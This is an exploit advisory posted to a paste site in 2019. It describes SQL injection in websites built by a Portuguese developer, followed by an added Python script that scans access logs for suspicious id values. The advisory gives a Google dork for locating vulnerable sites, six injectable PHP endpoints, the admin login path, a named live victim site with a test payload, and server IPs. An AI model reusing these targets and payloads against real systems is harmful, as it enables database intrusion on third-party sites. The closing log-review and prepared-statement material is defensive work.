KingSkrupellos

Desenvolvido C3iM Portugal SQL Injection

Jan 16th, 2019
#########################################################

# Exploit Title : Desenvolvido C3iM Portugal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/01/2019
# Vendor Homepage : c3im.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido C3iM'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#########################################################

# Admin Panel Login Path :
*************************
/admin

# SQL Injection Exploit :
***********************

/associados_id.php?id=[SQL Injection]

/conteudo.php?id=[SQL Injection]

/new.php?id=[SQL Injection]

/content.php?id=[SQL Injection]

/event.php?id=[SQL Injection]

/noticia.php?id=[SQL Injection]

#########################################################

# Example Vulnerable Site :
*************************

[+] danotec.pt/conteudo.php?id=1%27 =>

[ Proof of Concept ] => archive.is/BcJYk

Note : (192.185.106.107) => There are 104 domains hosted on this server.

Note : (192.185.86.89) => There are 174 domains hosted on this server.

#########################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################
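
# Detection example (added here, not part of the original paste) :
*************************

Every script listed above takes an id parameter, so a site owner can review web access logs for requests to those scripts where id is not a plain integer. The log lines, the combined log format and the function name below are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names taken from the advisory; each takes an `id` parameter.
WATCHED = {"associados_id.php", "conteudo.php", "new.php",
           "content.php", "event.php", "noticia.php"}

# Assumed common/combined log format: IP - - [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_id_requests(lines):
    """Return (ip, script, decoded_id, status) for watched scripts whose
    `id` parameter is anything other than a plain decimal integer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        script = url.path.rsplit("/", 1)[-1].lower()
        if script not in WATCHED:
            continue
        # parse_qsl percent-decodes, so id=1%27 is compared as "1'".
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "id" and not re.fullmatch(r"[0-9]{1,10}", value):
                findings.append((m["ip"], script, value, int(m["status"])))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jan/2019:10:00:01 +0000] "GET /conteudo.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Jan/2019:10:00:05 +0000] "GET /conteudo.php?id=1%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [17/Jan/2019:10:00:09 +0000] "GET /noticia.php?id= HTTP/1.1" 200 298',
    '192.0.2.10 - - [17/Jan/2019:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
    '203.0.113.4 - - [17/Jan/2019:10:00:20 +0000] "GET /site/event.php?lang=pt&id=7 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for finding in suspicious_id_requests(SAMPLE_LOG):
        print(finding)
```

Log review only shows that the parameter was probed. The fix belongs in the application: bind id as an integer parameter in a prepared statement and stop returning raw MySQL error text to the client.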